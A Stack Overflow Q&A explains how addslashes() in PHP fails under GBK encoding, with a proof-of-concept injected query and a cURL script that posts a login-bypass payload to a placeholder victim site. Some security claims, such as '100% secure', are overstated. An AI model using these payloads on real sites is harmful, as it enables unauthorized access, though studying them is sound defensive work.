# Examples of SQL Injections through addslashes()?

Tags: php, sql, sql-injection, security

In PHP, I know that `mysql_real_escape` is much safer than using `addslashes`.
However, I could not find an example of a situation where `addslashes` would let an SQL Injection happen.

Can anyone give some examples?

Answer (score 49, accepted):

Well, [here's the article you want](http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string).

Basically, the way the attack works is by getting `addslashes()` to put a backslash in the middle of a multibyte character such that the backslash loses its meaning by being part of a valid multibyte sequence.

The general caveat from the article:

> This type of attack is possible with any character encoding where
>   there is a valid multi-byte character that ends in `0x5c`, because
>   `addslashes()` can be tricked into creating a valid multi-byte character
>   instead of escaping the single quote that follows. UTF-8 does not fit
>   this description.

Comment: How about magic quotes? I have seen site who just puts $POST['password'] into the SQL query, and it does not fail for them. Can you explain why does it work?

Comment: Magic quotes are a whole 'nother topic; see http://stackoverflow.com/questions/220437/magic-quotes-in-php.  Presumably the example you give 'works' because magic quotes are on.  Among the many reasons not to use magic quotes is that magic quotes uses the same logic as addslashes(), so has the same vulnerability described here.

Answer (score 4):

As an addition for the readers of the answers here: This MySQL bug has already been fixed:)

Also, it is always good practice to use prepared statements. It is the most exploit-free way you can fire queries (and, in several use cases the most performant). And it would have saved you from this flaw.

Comment: Can you mention your source on this bug fix? Thanks!

Answer (score 4):

[Chris Shiflett](http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string) clearly explains with the bellow example, That will of-course work if you try it when using GBK encoding in your database. Even I tried it, this proves, there are chances for sql injection, even though they are very less, but someone with good knowledge and capability can easily inject. Here is an Example...

```
<?php 

       $mysql = array();
       $db = mysqli_init();
       $db->real_connect('localhost', 'myuser', 'mypass', 'mydb');

       /* SQL Injection Example */

       $_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
       $_POST['password'] = 'guess';

       $mysql['username'] = addslashes($_POST['username']);
       $mysql['password'] = addslashes($_POST['password']);

       $sql = "SELECT * FROM   users
               WHERE username = '{$mysql['username']}'
               AND password = '{$mysql['password']}'";

       $result = $db->query($sql);

       if ($result->num_rows) {
              /* Success */
       } else {
              /* Failure */
       }

?>
```

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection, I hope this will help you a bit more to understand:

```
<?php

       $url     = "http://www.victimsite.com/login.php";
       $ref     = "http://www.victimsite.com/index.php";
       $session = "PHPSESSID=abcdef01234567890abcdef01";

       $ch      = curl_init();

       curl_setopt( $ch, CURLOPT_URL,            $url     );
       curl_setopt( $ch, CURLOPT_REFERER,        $ref     );
       curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE     );
       curl_setopt( $ch, CURLOPT_COOKIE,         $session );
       curl_setopt( $ch, CURLOPT_POST,           TRUE     );
       curl_setopt( $ch, CURLOPT_POSTFIELDS,     "username=" . chr(0xbf) . chr(0x27) .
                                                 "OR 1=1/*&submit=1" );

       $data = curl_exec( $ch );

       print( $data );
       curl_close( $ch );
 ?>
```

Answer (score 1):

[mysql_real_escape_string() versus Prepared Statements](http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html) clearly explains **mysql_real_escape_string() isn't 100% secure**.

using **mysql_set_charset('GBK')** to replace **mysql_query("SET CHARACTER SET 'GBK'")**, the mysql_real_escape_string() can be 100% secure.